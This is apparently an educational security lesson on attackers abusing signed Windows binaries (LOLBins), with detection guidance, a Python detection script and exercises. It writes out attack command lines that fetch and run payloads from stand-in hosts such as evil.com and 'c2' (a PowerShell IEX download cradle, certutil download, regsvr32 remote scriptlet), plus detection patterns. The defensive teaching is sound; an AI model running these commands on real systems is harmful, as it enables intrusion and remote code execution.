EpochZero Learn: Multi-Domain Tech Learning Hub
Ep. 4.2 · reverse-engineering

Malware's Perfect Disguise: Inside Advanced Code Injection

8 May 2026 · 1 view

Why attackers use legitimate Windows binaries instead of dropping their own. The LOLBin catalogue, three abuse categories with examples, and detection guidance.

The shift away from custom binaries

Ten years ago, malware analysts spent most of their time on custom executables that the attacker had compiled and dropped on disk. Today, sophisticated operators avoid dropping anything. Instead, they use legitimate, signed Windows binaries already present on every machine — abusing them to download payloads, execute code, and bypass security controls. Security tools struggle to block these binaries because doing so would break legitimate administrative functions.

This is Living off the Land (LotL), and the abused binaries are LOLBins.

Why LotL works

A typical endpoint protection product maintains policies like "alert if powershell.exe invokes a network connection" — but powershell.exe is signed by Microsoft, used by sysadmins daily, and runs ordinary management tasks constantly. Alerts on every PowerShell invocation drown the SOC in noise. The defender's choice is to either accept the noise or write narrower rules — narrower rules attackers can side-step.

The asymmetry is the attacker's friend. They need one technique that survives every signature update. The defender needs to spot one signal in a million benign events.

The LOLBin catalogue

Binary                    Abuse
powershell.exe            Execute encoded commands, download payloads (Invoke-WebRequest), run scripts in memory without touching disk
wmic.exe                  Execute commands on remote machines, create processes, query system information; abused for lateral movement
mshta.exe                 Execute VBScript or JavaScript embedded in .hta files; bypasses application whitelisting
msiexec.exe               Download and execute malicious .msi packages from a URL
certutil.exe              Download files (-urlcache -split -f), decode Base64 payloads (-decode); originally a certificate management tool
rundll32.exe              Execute arbitrary DLL exports; can also run JavaScript
regsvr32.exe              Register COM objects from remote .sct scriptlets, bypassing AppLocker
wscript.exe, cscript.exe  Execute VBScript / JScript files; common for phishing-borne payloads
bitsadmin.exe             Background Intelligent Transfer Service; download files silently

Each binary is signed, present in C:\Windows\System32, and indispensable to the OS.

Three abuse categories with worked examples

Fileless execution: PowerShell

powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden ^
  -Command "IEX(New-Object Net.WebClient).DownloadString('http://c2/stager.ps1')"

This downloads and executes a script entirely in memory. No file touches disk. Breakdown:

  • -NoProfile — skip the profile script (faster, fewer logs).
  • -ExecutionPolicy Bypass — ignore signing requirements.
  • -WindowStyle Hidden — no visible console window.
  • IEX — Invoke-Expression, executes the downloaded string as PowerShell code.

Net.WebClient.DownloadString reads the URL into memory; IEX interprets the result. The malicious code never has a filename or a hash on the victim's filesystem. EDRs that focus on file-on-disk indicators see nothing.

File download: certutil

certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\Users\Public\svc.exe
certutil.exe -decode encoded.txt payload.exe

certutil was designed for certificate management. It can also download arbitrary files (-urlcache -split -f) and decode Base64 (-decode). Both are essential for legitimate certificate workflows; both also serve attackers perfectly.

A SOC seeing certutil.exe make an outbound HTTP connection to an unfamiliar host should treat it as malicious until proven otherwise. Legitimate certutil usage almost never involves arbitrary URLs.

AppLocker bypass: regsvr32

regsvr32.exe /s /n /u /i:http://evil.com/payload.sct scrobj.dll

Executes a remote scriptlet (.sct) containing VBScript or JScript. The flags:

  • /s — silent mode (no dialog boxes).
  • /n — do not call DllRegisterServer.
  • /u — unregister mode (triggers the DllUnregisterServer path).
  • /i:URL — passes the URL to the scriptlet handler.
  • scrobj.dll — the Windows Script Component runtime.

This technique bypasses AppLocker's default policy because regsvr32.exe is a Microsoft-signed system binary that AppLocker permits by default.

Detection guidance

Pure signature-based detection cannot stop LotL. The defender's only effective tools are behavioural:

  • Command-line argument monitoring. Sysmon Event ID 1 captures the full command line of every process. Patterns like powershell -enc <base64>, certutil -decode, mshta http: are highly suspicious.
  • Parent-child process anomalies. winword.exe spawning powershell.exe is unusual. outlook.exe spawning mshta.exe is unusual. Map normal parent-child relationships and alert on deviations.
  • Network egress from unexpected processes. certutil.exe making outbound HTTP, or regsvr32.exe resolving DNS for an external host — neither is normal.
  • Encoded-command detection. PowerShell's -EncodedCommand flag with high-entropy Base64 payloads, especially long ones, is rarely benign.

Sysinternals Sysmon with a tuned config (Olaf Hartong's modular sysmon-config is the de facto standard) catches most of this with one log source.
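As an added example (not part of the lesson or of sysmon-config), the four behavioural rules above as runnable Python: they run over a handful of constructed Sysmon-style events that reuse the lesson's own command lines plus one benign certutil invocation that must stay quiet, and the -EncodedCommand rule actually decodes the blob to show the cradle inside. The event dictionary shape, field names and rule names are assumptions for the example, not Sysmon's real schema.

```python
import base64
import re
# Constructed sample Sysmon-style events (not real telemetry): id 1 = process create, id 3 = network connect.
CRADLE = "IEX(New-Object Net.WebClient).DownloadString('http://c2/stager.ps1')"
ENC = base64.b64encode(CRADLE.encode("utf-16-le")).decode()  # how -EncodedCommand blobs are built
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": f"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {ENC}"},
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\Users\Public\svc.exe"},
    {"id": 3, "image": r"C:\Windows\System32\certutil.exe", "dest": "203.0.113.10", "port": 80},
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"certutil.exe -verify C:\certs\server.cer"},  # benign certificate work: must not alert
    {"id": 1, "image": r"C:\Windows\System32\regsvr32.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": "regsvr32.exe /s /n /u /i:http://evil.com/payload.sct scrobj.dll"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {n + ".exe" for n in "powershell wmic mshta msiexec certutil rundll32 regsvr32 wscript cscript bitsadmin".split()}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmd):
    # PowerShell accepts any unambiguous prefix of -EncodedCommand; the blob is Base64 of UTF-16LE text.
    m = re.search(r"-e[a-z]*\s+([A-Za-z0-9+/=]{20,})", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not valid Base64 / UTF-16LE: nothing to decode
        return None

def analyze(ev):  # apply the lesson's behavioural rules to one event; return the rule names that fired
    hits, image, cmd = [], basename(ev["image"]), ev.get("cmd", "")
    if ev["id"] == 3:  # network-connect event: these binaries never need the network on their own
        return ["unexpected-network-egress"] if image in {"certutil.exe", "regsvr32.exe", "mshta.exe", "rundll32.exe"} else []
    if basename(ev["parent"]) in OFFICE and image in LOLBINS:
        hits.append("office-spawned-lolbin")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        hits.append("encoded-command")
        if re.search(r"iex|invoke-expression|downloadstring", decoded, re.I):
            hits.append("download-cradle")
    if image == "certutil.exe" and re.search(r"-urlcache|-decode", cmd, re.I):
        hits.append("certutil-download-or-decode")
    if image in {"mshta.exe", "regsvr32.exe", "msiexec.exe"} and re.search(r"https?:", cmd, re.I):
        hits.append("remote-script-execution")
    return hits
```

Running `[analyze(e) for e in EVENTS]` fires on the four malicious events and returns an empty list for the benign certutil call, which is the false-positive check EX.03 asks for.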

What you should be comfortable with after this lesson

  • Naming the major LOLBins and one abuse for each
  • Reading a suspicious command line and identifying the abuse category
  • Explaining why LotL is harder for defenders than custom-binary malware
  • Configuring Sysmon to detect the most common abuse patterns

Exercises

EX.01 (easy)

Spot the abuse category

For each of these command lines, name the LOLBin abuse category (fileless / download / AppLocker bypass): (1) mshta http://evil/x.hta, (2) bitsadmin /transfer /download, (3) powershell -EncodedCommand <b64>.

EX.02 (medium)

Configure Sysmon and detect

Install Sysmon with sysmon-modular. Run a test PowerShell -EncodedCommand. Find the matching event in Event Viewer. Verify the encoded command was logged.

EX.03 (hard)

Build a detection rule

Write a Sigma rule that detects certutil.exe making outbound HTTP connections. Test it against benign certutil usage to verify it doesn't false-positive.